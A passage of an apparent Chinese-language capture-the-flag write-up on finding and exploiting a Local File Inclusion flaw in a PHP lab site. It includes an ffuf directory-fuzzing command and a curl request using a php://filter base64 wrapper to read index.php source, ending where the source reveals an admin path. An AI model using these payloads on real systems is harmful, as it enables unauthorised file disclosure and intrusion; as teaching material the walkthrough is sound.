Write Up-by renu
废话不多说,下面开始我们的实验,开始
我们目前就只有一个 ip 地址,其他什么信息都没有,通过读题我们知道这个网
站有 LFI 漏洞,所以我们就可以先想想这个漏洞一般会出现在哪些场景中?这个
漏洞产生的原因是什么?我们知道 LFI 漏洞产生一般是由于网站使用了动态脚本
语言编写或者是一些动态语言的框架搭建的,在动态加载内容时,由于没有对用
户的输入进行检查,导致前端用户可以通过这个点对后端服务器进行一些文件的
读取甚至能够远程执行他们输入的命令
首先打开网站,进入网站我们可以看到顶部个导航栏,我们点开看看,我们发现
URL:http://188.166.168.88:31435/index.php?page=industries
我们发现这个网站是用 php 语言编写的,满足我们的一个条件是动态脚本语言编
写,然后我们发现 page 这个参数控制页面加载的的内容,通过给 page=?一个参
数,页面会加载我们指定的页面到当前页面
接下来很自然就想到这个点是最容易产生 LFI 漏洞的地方。好了到这里暂时分析
完毕。其他什么东西暂时未发现,我们可以先做 FUZZ 测试,看看当前网站目录
下有哪些东西,执行如下命令:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ
-u http:// 188.166.168.88:31435/FUZZ.php -ac
结果如下:
index.php
about.php
contact.php
main.php
error.php
industries.php
我们发现上述一些文件,那我们发现执行加载不同页面的关键是给 index.php 脚
本文件 page=? 一个参数,然后就会加载相应的页面到当前页面中,那关键就是
index.php 这个文件内部执行了一些操作,所以我们看看能不能拿到这个源文件
执行如下命令:
curl -s -i
http://188.166.168.88:31435/index.php?page=php://filter/read=convert.base64-enc
ode/resource=index | base64 -d
结果如下:
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
评论0
最新资源